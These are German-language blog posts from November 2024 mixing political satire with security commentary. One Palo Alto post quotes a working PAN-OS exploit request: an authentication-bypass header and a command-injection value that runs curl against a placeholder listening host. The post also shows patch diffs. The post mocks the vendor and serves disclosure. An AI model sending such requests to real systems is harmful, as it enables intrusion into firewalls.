Fefes Blog

Wer schöne Verschwörungslinks für mich hat: ab an felix-bloginput (at) fefe.de!

Fragen? Antworten! Siehe auch: Alternativlos

Thu Nov 21 2024

[l] Falls hier jemand D-Link-Geräte einsetzt: HAHA SUCKER. Sagt D-Link. Ich paraphrasiere nur.

Wed Nov 20 2024

[l] Im Moment kursieren (natürlich!) Anschuldigungen des Wahlbetrugs in den USA.
Hier ist der seriösere der offenen Briefe.
Der Zug ist abgefahren. Biden und Harris hatten JAHRE Zeit, das Wahlsystem zu reformieren. Haben sie nicht gemacht. Weil sie dachten, vielleicht, dass ihnen das Herrschaftswissen selber mal nutzen würde.
Geliefert wie bestellt. Ich habe kein Mitleid und keinen Drang da irgendwas aufgeklärt zu kriegen. Das war ihre Chance und sie haben es verkackt.
So und nur so funktioniert Evolution. Wenn man sich aus verkacktem Verhalten wieder rausschleimen kann, funktioniert das nicht. Das muss tödlich sein und die nächste Generation hat dann hoffentlich was gelernt. Oder sie ereilt, genauso verdient, dasselbe Schicksal.
Ich positioniere mich immer gerne so, dass ich danach Told You So sagen kann. Well... Told You So. Nein, ich werde euch jetzt nicht helfen, die Auswirkungen eures nicht auf mich hörens zu verringern.
[l] Aus der beliebten Politikschule "jetzt ist auch egal", heute: Biden will der Ukraine noch schnell Anti-Personen-Minen liefern.
Na? Krieg ich jetzt auch wieder Leserbriefe, dass die gar nicht wirklich geächtet sind?
[l] Die CIA hat herausgefunden, dass ein Atomkrieg schlecht für die Wirtschaft wäre. (Danke, Philip)
[l] Wieso hat Selenskyj eigentlich keinen Trump-Golfplatz in Kharkiv gebaut?
Wir haben die besten Golfplätze! Mit den meisten Kratern, äh, Löchern!
[l] Genau mein Humor: Trend Micros Deep Security Agent ermöglicht Einschleusen von Schadcode.
Und alle so: NEIN!!!! DOCH!!! OOOOOH!!
Immerhin ist die Benamung richtig. Es handelt sich um einen Agenten. Nur halt nicht für unsere Seite.
Trend Micro bewirbt sich auch direkt auf einen Lame Excuse Award:
Um die Lücke zu missbrauchen, benötigten Angreifer physischen oder Fernzugriff auf eine verwundbare Maschine, schränkt Trend Micro ein.
Was genau schränkt das ein? LMAO (Danke, Magnus)
[l] Diese Meldung funktioniert auf mehreren Ebenen.
Die Deutsche Bank steigt bei "KI"-Startup Aleph Alpha ein, kauft Anteile von Frühinvestoren (d.h. kauft die VCs raus, die offenbar kapiert haben, dass dieser "KI"-Scheiß Bullshit ist und raus wollten).
Das finde ich schonmal eine gute Nachricht, wenn die VCs um ihr Leben fürchten.
Aber was will die Deutsche Bank mit "KI"? Nun, ...
Das Institut nimmt auch an einem Projekt von Creance.ai teil – einer Kooperation von PwC Deutschland und Aleph Alpha, bei der untersucht wird, wie generative KI helfen kann, Compliance-Anforderungen effizienter zu bewältigen. Verträge mit Dienstleistern sollen im Einklang mit der EU-Verordnung DORA validiert werden.
Da unseren Regulierern und Politikern in Sachen "was könnten wir mal besser machen" nichts einfällt außer "Hmm man könnte mehr Papierkram von den Firmen fordern", versinken die Firmen gerade alle in sinnlosem Papierkrieg und produzieren alle Palettenweise sinnlosen Text, den nie jemand lesen wird.
Denn wer sollte das lesen? Die Regulierungsbehörden? Soviele Bürger gibt es in diesem Land nicht, die die alle einstellen müssten. Die Regulierer wissen das, die Firmen wissen das, und damit ist der Weg frei für: "KI" schreibt die sinnlosen Texte, die eh nie jemand lesen wird.
Eine Erfolgsgeschichte! Ach was sage ich: Ein Exportschlager!!
Denn Deutschland drückt diese Marktverzerrung (kleine Konkurrenten können sich den Scheiß nicht leisten, so garantiert die Politik das Überleben der Deutschen Bank und anderer Ineffizienzmaschinen) natürlich EU-weit durch. Die werden auch alle "KI" kaufen müssen. Warum also nicht bei uns?!
Wenn es nicht so traurig wäre, könnte man die alle prima auslachen.
Update: Ist ja gut. Ihr könnt mir zu schreiben aufhören, dass man halt eine "KI" anschaffen muss, um den "KI"-Compliance-Output zu lesen. Der Witz war implizit, denn eine "KI" ist ja keine Person. Das liest nach wie vor niemand.
[l] OLG Schleswig-Holstein: Keine Social-Media-Sperre ohne vorherige Nutzeranhörung.
Die Entscheidung wird wahrscheinlich klarer, wenn man guckt, um was für einen Beitrag es hier ging:
Der Blockierte hatte das Ergebnis einer Kreistagswahl 2021 so kommentiert: "Die Deutschen sind sowas von krank. Deutschland hat fertig."
Lol wat? Dafür sperrt Facebook Accounts und löscht unilateral Beiträge?!
[l] All diese Palo Alto Exploits, das kann Fortinet nicht auf sich sitzen lassen!
Chinese hackers exploit Fortinet VPN zero-day to steal credentials
Und natürlich ist Fortinet genau so drauf wie der Rest der Industrie, wenn es um Bug-Fix-Geschwindigkeit geht.
"Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024," explains the report.
"At the time of writing, this issue remains unresolved and Volexity is not aware of an assigned CVE number."
Aber Fortinet ist nicht Microsoft, also kolportiert die Presse nicht das übliche unerträgliche Gewinsel von Microsoft, dass hier unschuldige Kunden gefährdet würden und man doch Responsible Disclosure fordert. Da krieg ich jedesmal Zucken in der Faust, wenn ich das lese. Die Kunden werden ja nicht von der Disclosure gefährdet sondern von der beschissenen Produktqualität ihrer versifften Zulieferer. (Danke, Dino)
[l] Hier kamen mehrere Leserbriefe rein, dass Streumunition ja nicht wirklich geächtet sei. Nur Länder, die nicht annahmen, dass sie demnächst Krieg führen werden, hätten sie geächtet. Und überhaupt, wieviel kann eine Ächtung schon wert sein, wenn China und Indien nicht dabei sind, die zusammen die Hälfte der Menschheit sind.
Nun, nehmt nicht mein Wort, dass das geächtet ist. Nehmt das der ARD, wenn es um Russland ging.
Diese Waffen sind durch internationale Verträge geächtet.
Ach. Ach was. Aber wenn die Ukraine das einsetzt, ist es nicht geächtet, nehme ich an? Tolle Wurst. (Danke, Oliver)
[l] Erinnert ihr euch an Südwestfalen-IT? Diesen kommunalen Dienstleister für die ganzen Kommunen in der Gegend? Der dann einen "Cybervorfall" hatte und dann monatelang nicht in der Lage war, wieder voll verfügbar zu sein?
Da gibt es jetzt Folgen.
Einem ehemaligen Geschäftsführer, der noch Gehalt kassierte, wurde gekündigt. Gegen weitere Mitarbeiter wurden Disziplinarmaßnahmen eingeleitet.
Und, fast noch schockierender:
Die bisherige Organisationsform mit einer "aufgeblähten" 119-köpfigen Verbandsversammlung und einem von Politikern dominierten Vorstand werde reformiert, heißt es. Künftig sollen mehr IT-Experten dem Gremium angehören.
ACH. ACH WAS. Es ist jemandem aufgefallen, dass Politiker gar nichts können und man ihnen keine Verantwortung übergeben darf, schon gar nicht in Gesellschaften, die einen tatsächlichen Zweck erfüllen sollen und nicht nur Geld verbrennen dürfen wie Lotto und SPD-eigene Verlage? Das ist ja unglaublich!
Gibt es etwa doch noch Hoffnung?
Update: Wenn man genauer hinguckt, ist die Antwort natürlich: Nein, gibt es nicht. Denn keiner von denen musste in den Knast, keiner musste irgendwas zurückzahlen, im Gegenteil hat der eine Typ noch jahrelang Gehalt gekriegt, ohne dafür auch nur zur Arbeit erschienen zu sein. Wie das halt so ist, wenn "kommunale Dienstleister" mit abgehalfterten Politikern bestuhlt werden.

Tue Nov 19 2024

[l] Wo wir gerade bei der Kategorie "genau mein Humor" waren: Ottawa paid nearly $670,000 for KPMG’s advice on cutting consultant costs. *Wieher* (Danke, Joshua)
[l] Braucht ihr mal einen richtigen Bauchlacher? Die Meldung hier liefert.
immerhin sei Windows 11 bereits "das sicherste Betriebssystem der Welt", wie die Ankündigung betont.
BWAHAHAHA genau mein Humor!
Und schließlich will Microsoft den Identitätsschutz verbessern, um Phishing-Angriffe zu verhindern.
Der einzige, der alle eure Daten sehen können soll, soll Microsoft sein. Und ihr bezahlt noch dafür. Wie diese Mauer um Mexiko herum, falls ihr euch erinnert.
[l] Das US-Justizministerium denkt laut darüber nach, Google zum Chrome-Verkaufen zu zwingen. Wegen Monopolmissbrauchs.
Ich glaube nicht, dass das ernst gemeint ist. Ich glaube, das Kalkül lief etwa so: Biden ist eine lahme Ente, wir sind frisch abgewählt, und Trump hasst unsere Kumpels, die Tech Bros.
Trump findet ja, dass die Social Networks und Suchmaschinen ihn unfair benachteiligt haben, indem sie seine Misinformationen zu bekämpfen und rauszufiltern versucht haben, und hat daher als neuen FCC-Chef (deren Kommunikations-Regulierer) diesen Spezialexperten ausgesucht, der von einem "Zensurkartell" spricht, das man jetzt zerschlagen müsse.
Das ungerechte Zorn der Republikaner richtet sich vor allem gegen Facebook, aber auch gegen Google, wegen Suche und Youtube, wo Google bei Covid-Lügnern Hinweise eingeblendet hat, so man sich inhaltlich belastbarer informieren kann.
Aus Sicht der untoten Democrats im abgewählten Justizministerium ist also absehbar, dass Trump die Tech-Riesen zerschlagen wird. Die Democrats wissen auch, dass Kartelle Scheiße sind, und wenn die Tech Bros nicht alle in Democrat-Hochburgen säßen und dort Arbeitsplätze schüfen, hätte man vielleicht auch schonmal etwas zu unternehmen versucht. Aber hey, wenn die eh demnächst geschlachtet werden, dann kann man wenigstens jetzt so tun, als sei man selbst der Auslöser gewesen, der hier Gerechtigkeit schafft. Denn das Narrativ ist den Democrats ja bereits ziemlich komplett entglitten an der Stelle. Google Search ist so schlecht geworden, dass Googles "das schadet dem Kunden" vor allem Gelächter auslöst.
[l] Fallout: Japan eröffnet stark mit einer Jury-Rig-Gauss-Handgun (vergleiche: die Bastelkanone aus der Abe-Ermordung).
[l] Läuft offenbar gut, der Fünffrontenkrieg Israels gerade. So gut, dass Artikel wie dieser in der Jerusalem Post veröffentlicht werden:
Southern Lebanon is actually northern Israel - opinion
Na dann können wir das ja bedenkenlos annektieren! (Danke, Felix)
[l] Die ARD schreibt:
ATACMS können mit Streumunition bestückt werden, die sich am Zielort in einem weiten Radius verteilt. International ist Streumunition höchst umstritten, weil sie wegen ihres Streufaktors auch Jahre nach einem militärischen Konflikt zu zivilen Opfern führen kann. Im Ukraine-Krieg wurde sie auch deshalb ausgeliefert, um den großen Vorsprung Russlands bei der Munitionsproduktion auszugleichen. Zudem kann Streumunition besonders effektiv gegen Truppen und ungepanzerte Fahrzeuge im offenen Gelände eingesetzt werden.
Schade, dass die ARD sich kein Fact Checking leisten kann. Sonst hätte ihnen jemand mitgeteilt, dass Streumunition nicht "umstritten" sondern geächtet ist. Das ist ethisch so sonnenklar, dass sogar der Heilige Stuhl das ratifiziert hat. Selbst der Südsudan ist beigetreten. Aber die USA, Russland und die Ukraine haben nicht unterschrieben, genausowenig wie China und Israel, Indien und Pakistan. Selbst in der EU gibt es ein paar Gruselstaaten, die sich in Ethikfragen noch hinter dem Südsudan eingereiht haben: Finnland, Estland, Lettland, Polen, Rumänien und Griechenland. Eine Schande.
Deutschland hat das unterschrieben und ratifiziert. Insofern bin ich irritiert, dass die ARD das jetzt als eine offene Streitfrage darstellt, ob man das einsetzen sollte oder nicht.
[l] Hey, liebes BSI? Kurze Frage für einen Freund.
Wieviele KRITIS-Organisationen setzen eigentlich Fortinet oder Palo Alto ein? Und sind damit durch diverse Audits und Pentests gekommen?
Wir haben doch umfangreiche Dokumentationspflichten jetzt. Erzählt doch mal, wie gut die geholfen haben!
Wie viele Firmen haben ISO-27001 und Fortinet/Palo Alto?
Fällt euch selber was auf oder muss ich weiterreden?
Update: Leserbrief:
Ich arbeite in einem Kritis-Unternehmen (Strom). Habe heute im Flurfunk mitbekommen, dass wir in unserem neuen Rechenzentrum nicht mehr auf Fortinet setzen.
Wir werden da etwas einsetzen von:
Palo Alto
Badumm Tsssss
Ich persönlich wundere mich ja nicht, dass wir ständig gehackt werden. Ich wundere mich, dass wir nur so wenig gehackt werden. Das liegt wahrscheinlich daran, dass unsere Spezialexperten wegen des ganzen Checklistenballetts nicht bemerken, dass und wie lange und von wie vielen parallel sie schon kompromittiert wurden.
[l] Ich habe vor einer Weile angefangen, Compliance-Bullshit als Kunstförderung zu bezeichnen, weil es halt reines Theater ist und nichts bringt.
Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß ist, über den wir schon in den 1980er Jahren gelacht haben.
Aktuelles Beispiel: Palo Alto. Ja, die schon wieder. SCHON WIEDER. Ich hab auch keinen Bock mehr.
```
X-PAN-AUTHCHECK: off
```
Ich wünschte, ich würde Witze machen.
```
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
```
Und was fiel da raus? Richtig! Eine gültige Session-ID!
Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto jetzt wochenlang saß, während ihre Kunden fröhliche exploitet wurden.
```
+    $user = $_POST['user'];

+    if (strlen($user) <= 63

-            $_POST['user'],
+            $user,
```
Die neue Eingabevalidierung ist ... eine Längenbegrenzung. Nein, wirklich!
Ich wünschte, ich würde Witze machen.
```
-    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");
+    $u = $s->escapeshellarg($username);
+    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $u");
```
Wisst ihr was? You had me at PHP. (via)
[l] Wo wir gerade bei FDP und Verrat waren: "NIUS" (Achtung: Link geht zu "NIUS") ist entsetzt, dass eine FDP-Politikerin an Abmahnungen wegen Hate Speech im Internet mitverdient.
Was?! Die FDP besteht aus windigen Geschäftemachern, deren Prinzipien nur vorgeschoben sind?! Das ist ja unglaublich, Bob! Hättet ihr mal die CDU gefragt, die wissen das schon länger!
Dass diese FDP-betriebene Abmahnfirma auch noch neben CDU-Hasszerrbild Habeck auch noch Julia Klöckner (CDU!!!) zu ihren Kunden zählt, rundet das Schreckenslagebild ab.
Update: Falls ihr "NIUS" nicht kennt: Das ist das neue Projekt von Ex-"Bild"-"Redakteur" Julian Reichelt, der ja auch wegen Verrats an Döpfner Ärger hatte. Da schließt sich der Kreis. Auch du, Brutus?
[l] Setzt euch mal kurz stabil hin, damit ihr nicht aus dem Stuhl fallt.
CDU-Politiker zweifeln an Verlässlichkeit der FDP.
Nein, wirklich! Die Verlässlichkeit der FDP!!!
FDP-Chef Christian Lindner komme ihm "mehr wie ein Spieler vor denn als ein verlässlicher Politiker", sagte der innenpolitische Sprecher der Unionsfraktion im Bundestag, Alexander Throm dem Magazin Stern. Der CDU-Politiker fügte hinzu: "Das einzige, auf was man sich bei Lindner verlassen kann, ist die Orientierung an den eigenen Interessen der FDP."
CDU-Politiker (!) haben erkannt (!!), dass der Lindner nur seine eigene Karriere optimiert und dabei wie ein Zocker agiert.
Ich weiß gar nicht, was mich daran mehr erschüttert. Dass jemand in der CDU etwas erkannt hat, oder dass sie das für ein Unterscheidungsmerkmal zwischen CDU und FDP halten.
Ich finde das jedenfalls zum Brüllen komisch gerade.
Tja, liebe FDP. Außerhalb der SPD gilt immer noch: „Alle lieben den Verrat, niemand liebt den Verräter“.
[l] VW will ab Mitte 2025 in Hamburg autonome Sammeltaxis fahren lassen.
Was meint ihr, können die nur autonom fahren oder erkennen die auch, wenn ihr Innenbereich von besoffenen Touristen vollgekotzt wurde?
[l] Die G20-Staaten haben eine geniale Idee: Man könnte Superreiche mal wirksam besteuern.
Wird natürlich nicht passieren, denn wo sollen dann die "Aufwandsentschädigungen" und "Wahlkampfspenden" für die Parteien herkommen.
[l] Kann Palo Alto noch tiefer ins Klo greifen? Aber ja doch! Die Lücke, mit der seit Wochen ihre Kunden aufgemacht werden, die wollen sie jetzt selbst gefunden haben, und damit es nicht so übel aussieht, wie lange die auf dem Bug saßen, haben sie das Advisory auch vordatiert auf gestern, obwohl es das Advisory von vor zwei Wochen ist.
Das war bestimmt ein bedauerlicher Softwarefehler oder so. Oder menschliches Versagen. Dafür sind Palo Alto ja Spezialisten.
Auch dass da "Automatable: NO" steht ist glatt gelogen. Macht nur keiner, weil das einfach eine PHP-Seite ist, die das Admin-Passwort auf "palo alto" zurücksetzt, wenn ich das nicht mit einer anderen Palo-Alto-Lücke gerade verwechsele. Anderswo würde man das als Backdoor bezeichnen, nicht als "Lücke".
Aber hey, was reg ich mich auf. Ihr werdet alle weiter bei denen kaufen, und die werden keinen Druck haben, bessere Produkte zu bauen.
Das Hauptinteresse der Passanten gerade lässt sich offensichtlich befriedigen, indem man eine Liste von IPs als "IoC" verteilt. Wenn mir das vor 20 Jahren jemand als Scifi-Plot angeboten hätte, hätte ich ihn aus dem Raum gelacht.
Update: Ich habe das mit dem anderen Palo-Alto-Müll verwechselt. Hier brauchte man mehrere trivial automatisierbare Schritte.
[l] „Operationsplan Deutschland“ – Bundeswehr bereitet Unternehmen auf Kriegsfall vor.
Es handelt sich, natürlich, um einen Stapel Papier, in der ersten Fassung ca 1000 Seiten lang.
Primärquelle ist die FAZ, aber die hat sich ja mit ihrer Paywall selbst ins Aus geschossen, lizenziert aber ihre Inhalte an Microsoft, daher geht der Link oben zu MSN. Herzlichen Glückwunsch, FAZ. Geniale Strategie.
Ich für meinen Teil bin erleichtert, dass die Bundeswehr immerhin noch Papier produzieren kann. Auch wenn das vermutlich McKinsey für sie gemacht haben wird.
Was steht da so drin? Die FAZ zitiert einen brandheißen Tipp:
„Bilden Sie auf hundert Mitarbeiter mindestens fünf zusätzliche Lkw-Fahrer aus, die Sie nicht benötigen“, lautet sein Vorschlag nach F.A.Z.-Informationen.
Der Grund für die Maßnahme: „70 Prozent aller Lastwagen auf Deutschlands Straßen werden von Osteuropäern bewegt. Wenn dort Krieg ist, wo werden dann diese Leute sein?“
Diese Scheiß Osteuropäer immer! Nur weil zuhause ein bisschen Krieg ist, vernachlässigen die ihre Pflichten uns gegenüber!? Alle ausweisen!1!!
Scheiß Nordkoreaner immer! (Danke, Manuel)

Mon Nov 18 2024

[l] Gute Nachrichten! USA und China: KI soll nicht über Einsatz von Atombomben entscheiden dürfen.
[l] C-Lion ist beschädigt. Das ist ein wunderschöner Name für ein Untersee-Datenkabel zwischen Deutschland und Finnland, an dem sich Hetzner beteiligt hat, um deren RZ in Finnland gut anzubinden.
Das Kabel lief wohl nahe der Nord Stream 2 Strecke und es gibt schon erste Sabotage-Spekulationen, weil Finnland ja in die Nato eingetreten ist.
Update: Undersea cable between Lithuania and Sweden damaged. Es scheint sich um ein separates Kabel zu handeln.
[l] Gute Nachrichten! Sie haben eine Anwendung für "KI"-Beschleuniger gefunden!
Geräusch als Warnung: KI kann vorab vor explodierenden Akkus warnen
Die Witze schreiben sich praktisch von selbst.
[l] Wenn es um ausländische Firmen geht, sitzen bei unseren Gerichten die Macheten locker.
Betroffene eines umfangreichen Datendiebstahls bei Facebook vor einigen Jahren haben nach einem Urteil des Bundesgerichtshofs (BGH) vergleichsweise niedrige Hürden, um Schadensersatz zu bekommen. Sie müssen nur nachweisen, dass sie Opfer des Vorfalls waren. Es sei weder nötig, dass die Daten nachweislich missbraucht wurden. Noch müssten die Betroffenen Belege dafür liefern, dass sie nun in besonderer Weise beeinträchtigt sind.
Finde ich grundsätzlich gut. Hat kaum jemand mehr verdient als Facebook. Auf der anderen Seite: War das nicht ein Scraper? Erinnert sich da noch jemand? Das wäre nach meinem Rechtsverständnis nicht Facebooks Schuld, wenn du deine Daten bei denen hochlädst und andere sie dann halt automatisiert runterladen.
Aber egal, was mich hier wirklich ärgert ist der Kontrast zu Modern Solutions, wo der Hersteller straffrei ausging und sie den Hacker verknackt haben, der den Bug gemeldet hat.
Oh und natürlich zu den ganzen Ransomwarefällen, auch und speziell bei Behörden. Wieso habe ich als Bürger gegen die keine Schadensersatzpflichten analog dieser Regelung?
Aber hey, Facebook sind Ausländer, bei denen kann man es ja machen. Sagt ein Gericht, dessen Justizministerium ein Microsoft-Cloud-Abo hat.
[l] Die CSU möchte gerne den Präsidenten des Bayerischen Bauernverbandes zum Bundeslandwirtschaftsminister machen. (Kontext zum Bauernverband) (Danke, Constantin)
[l] Brauchtumspflege ist ja gerade zur Weihnachtszeit wichtig für die Seele.
Heute: In Russland stürzen jetzt nicht mehr nur Oppositionelle sondern auch Balletttänzer aus Fenstern.
[l] Ich bereite ja gerade den Fnord-Jahresrückblick vor und gehe nochmal durch alle Blogmeldung des Jahres durch. Der Eindruck drängt sich geradezu auf, dass die Security-Firmen mich nötigen wollen, eine Kategorie für sie einzuführen.
Das Problem habe ich leider jedes Jahr aber so schlimm wie diesmal war es noch nie. Und es hört auch nicht auf! Guckt euch nur mal Palo Alto an. So blöde ist ja hoffentlich keiner von euch, bei denen zu kaufen. Die Meldung da ist vom Juni.
Die stellen also ihr "Expedition"-Produkt ein, das noch nie durch eine vertrauenswürdige Qualitätssimulation aufgefallen ist.
Warum? Nun, das könnte etwas hiermit zu tun haben: auth bypass (schöner Writeup dazu) SQL Injection OS Command Injection.
Ich applaudiere ja Palo Alto, dass sie erkennen, das ihr Produkt Schrott ist und weggeschmissen gehört. Das sollten viel mehr Hersteller machen. Aber wieso bei Expedition aufhören? PAN-OS hat genau solche Bugs auch gehabt. Von anderen Herstellern wie Fortinet oder Cisco mal ganz zu schweigen.
Mich fragte heute jemand, ob die das abreißen, weil zu viele Bugs reinkamen, und sie daher gemerkt haben, wie schrottig das ist. Meiner Erfahrung nach wissen alle Hersteller, wie schlecht ihre Produkte sind. Einige wollen es auf Management-Schicht nicht wahrhaben, und ganz, GANZ selten gibt es auch Produkte, bei denen die Ingenieure nicht wissen, wie Scheiße ihr Produkt ist, aber das ist echt die Ausnahme. Habe ich in knapp 30 Berufsjahren zweimal erlebt. Die meisten Firmen wissen das, und die sehen das als Gelegenheit, mit Supportverträgen Profit zu machen.
Häufig ist das so, dass ein Produkt ein Team hat, das über die Jahre technical debt aufgehäuft hat, und häufig geht der Verantwortliche dann, weil ein Mann von meiner Statur muss sich nicht mit brennenden Mülltonnen herumärgern, und der Rest des Teams erzählt mir beim Audit dann "das ist nicht mein Code, ich habe den bloß geerbt" (soll heißen: Ich habe keine Ahnung, was der tut, und traue mich nicht den anzufassen). Da kann ich echt die Uhr nach stellen bei Audits.
Natürlich will niemand in den Rückbau von technical debt investieren, daher wird das immer teurer und träger und am Ende sitzt man Monate auf Bugfixes (das Palo-Alto-Dingens gerade wurde denen im Juni gemeldet). Und guckt euch mal an, was das für ein geiler Bug ist. Die haben da eine PHP-Datei, per Web erreichbar, die das Admin-Passwort auf "paloalto" zurücksetzt. Ohne Authentisierung, versteht sich. Kann man einfach aufrufen und ist Admin.
Sorry, aber das ist kein "Bug". Das wusste die Firma auch, dass sie das haben. Dafür müsste in einer gerechten Welt jemand in den Knast.
Übrigens, am Rande: Falls ihr euch dachtet, Programmierer würden doch von ihrer Ethik und ihrer guten Erziehung davon abgehalten, brennende Mülltonnen in der Landschaft zu verteilen, dann solltet ihr diesen Artikel lesen. Programmierer sind von allen Berufsgruppen die unethischsten. Alle haben ein schlechtes Gewissen und fühlen sich als Betrüger, wenn sie "KI" fragen und dann so tun als sei das ihre Arbeit gewesen. Außer Programmierern. Die finden das normal.
Zentrale Gründe für das Unbehagen seien das Gefühl, Nutzung generativer KI fühle sich wie Mogeln an (47 Prozent), sowie Ängste, als weniger kompetent (46 Prozent) oder gar faul gesehen zu werden (46 Prozent).
In Deutschland waren es hauptsächlich Nachrichten an Chef (31 Prozent) oder an Kollegen auf der gleichen Hierarchiestufe (27 Prozent), Leistungsbeurteilungen (24 Prozent) oder Ideen-Brainstormings (22 Prozent), bei denen Befragte keine KI-Nutzung eingestehen mochten. Sich beim Coden von der KI helfen zu lassen, wäre hingegen nur neun Prozent peinlich.
Coder sind schlechte Menschen. Nur schlechte Menschen wie Scammer, Spammer, Marketing-Kokser und Coder lassen sich von "KI" helfen und haben kein schlechtes Gewissen.

Sun Nov 17 2024

[l] Ah, endlich mal wieder Brauchtumspflege: Trump ernennt Fracking-Unternehmer zum Energieminister. Das ist noch nicht die Brauchtumspflege. Das hier ist die Brauchtumspflege:
Als Politiker hat sich Chris Wright bisher nicht hervorgetan. Aber er hat mal Fracking-Flüssigkeit vor Kameras getrunken.
Aber hey, wer weiß. Vielleicht hilft das gegen Hirnwürmer.
Update: Ich habe mich ja gefragt, ob RFK vielleicht seine Impfleugnerei gerettet hat. Der fand ja Impfungen gefährlich und empfahl Ivermectin, was zwar nicht gegen Covid hilft aber ein Entwurmungsmittel ist.
[l] Old and busted: Flugzeuge in Haiti beschossen.
New hotness: Flugzeug in Dallas beschossen.
[l] Wenn ihr zum 38C3 gehen wollt, dann könnt ihr jetzt das jährliche halfnarp-Ritual vollziehen und die Vorträge klicken, die ihr gucken wollt. Anhand der Klicks versucht die Orga dann die Vorträge so zu legen, dass so wenig Vorträge parallel liegen, die von denselben Leuten geguckt werden wollen.
Außerdem ist das ein erster Blick darauf, welche Vorträge es ins Programm geschafft haben. Von mir ist der Fnord-Jahresrückblick dabei, dieses Jahr allerdings mit atoth statt mit Frank. Der musste leider kurzfristig zum "KI"-Training.
Der beste Vortragstitel geht meiner Ansicht nach jedenfalls klar an "Der Thüring-Test für Wahlsoftware". Wunderbar!
[l] Die Grünen küren Robert Habeck zum Kanzlerkandidaten.
Hey wisst ihr noch letztes Mal? Als die die Baerbock zum Kanzler machen wollten? BWAHAHAHAHA
Ich Völkerrecht, du Schweinebauer sage ich da nur.
Immerhin, bei allem Geunke über die Grünen. Wenn die mit der Realität kollidieren, dann ändern sie ihre Strategie. Zum Vergleich: Die CDU hat den Merz aufgestellt.
Die SPD hat noch nicht kapiert, dass sie mit der Realität kollidiert ist, und denkt immer noch über Cum-Ex-Olaf nach. Vielleicht wird's auch Pistorius, aber das ging eher von der Presse aus als von der SPD. Wie, ernsthaft? Ihr wollt nochmal die Schlaftablette aufstellen?!
[l] Ich stolpere hier gerade zufällig über den Deutschen Ethikrat:
Da der von der AfD vorgeschlagene und wegen der Ausstellung unrechtmäßiger Atteste zur Befreiung von der Maskenpflicht zu einer Bewährungsstrafe verurteilte Gynäkologe Ronald Weikl vom Bundestag abgelehnt wurde,[30] gehören dem Ethikrat statt 26 Mitgliedern nur 25 an:
BWAHAHAHAHAHAHA
[l] Aus aktuellem Anlass: Werdet Wahlhelfer. Ein Leser beschreibt den Vorgang:
Man meldet sich dafür unbürokratisch. Voraussetzung ist, dass man volljährig und in Deutschland wahlberechtigt ist. Einfach "Wahlhelfer" und den Namen der eigenen Gemeinde googlen.
Als Wahlhelfer ist man üblicherweise für eine 5h-Schicht vormittags oder eine zweite nachmittags im Wahllokal. Um 18:00 treffen sich alle Wahlhelfer beider Schichten, öffnen die Wahlurnen und zählen die Stimmen.
Eine Bundestagswahl ist schnell ausgezählt und man ist inklusive Bürokratie gegen 21:00 oder früher fertig. Europa- und Regionalwahlen haben kompliziertere Wahlzettel und Zählverfahren, da kann es später werden.
Man ist also am Wahltag einen 1/2 bis 3/4-Tag beschäftigt. Man kriegt einen kleinen Betrag, das sogenannte Erfrischungsgeld. Meine Gemeinde kümmert sich außerdem um Getränke und etwas Verpflegung für die Wahlhelfer, einmal brachten Wähler sogar Kuchen mit.
Als Wahlhelfer tut man an einer zentralen Stelle etwas für die Demokratie und für die eigene Nachbarschaft. Es ist lehrreich und zumindest mir macht es sogar Spaß. Man verhindert damit Wahlcomputer, die immer wieder mit dem Mangel an freiwilligen Wahlhelfern herbeigeredet werden. Und, wie man in Berlin und auch in meiner Gemeinde sieht, man entlastet die Verwaltung, weil diese sonst ihre Mitarbeiter zwangsweise dafür abziehen muss.
Das Erfrischungsgeld liegt im Moment in Berlin AFAIK bei sowas wie 100€, je nach dem, welche Funktionen man übernimmt, und es ist steuerfrei.

Sat Nov 16 2024

[l] "KI" halluziniert gerne und häufig, aber nicht immer: Elon Musks "Grok"-Bullshit-"KI" zum Beispiel hat das Licht gesehen, als sie gefragt wurde, wer auf Twitter die meisten Misinformationen verbreitet.
Die Antwort war: Elon Musk. (Danke, Danny)
[l] Leserbrief mit schönem Medienkompetenzhinweis:
Nachdem die Zeit und die SZ als Primärquellen ja ihre Recherche hinter einer Paywall versteckt hat, und nur die Konkurrenz darüber offen berichtet, sollte man sich noch angucken, was die in die Überschrift schreiben:
Tagesschau: „Plante die FDP das Ampel-Aus?“
Gemäß Betteridges Gesetz der Überschriften gilt, dass die Antwort auf einer Frage in einer Überschrift „Nein“ sein muss.
ZDF: „FDP soll Ampel-Aus lange vorbereitet haben“, ursprünglicher Titel: „Ampel-Aus: Hat die FDP den Bruch seit Wochen vorbereitet?“ (immer noch sichtbar oben)
Spiegel: „Berichte über angebliches Drehbuch für Ampelende FDP soll Koalitionsbruch über Wochen geplant haben“ (Hervorhebung durch mich)
Auch hier wird in der Überschrift so getan, als sei das einfach nur eine böswillige Unterstellung, und kein solide recherchiertes Fakt. Die Artikel in Zeit und SZ dagegen sind auf den Punkt betitelt.
Stimmt alles, aber es gibt auch eine "im Zweifel für den Angeklagten"-Erklärung: Die hatten schlicht die Hosen voll, dass sie Ärger kriegen, wenn sie sich das zueigen machen.
Das ist eine Sache, die man auch in den USA gerade in beängstigendem Ausmaß beobachten kann. Wie die Milliardäre alle vor der Wahl bemüht waren, sich nicht auf Kamala Harris festzulegen, und jetzt dem Donald Trump in den Arsch kriechen. Es gab einen Milliardär, Mark Cuban, der sich auf Kamalas Seite geschlagen hat. Der hat dann Trump noch vor Kamala gratuliert.
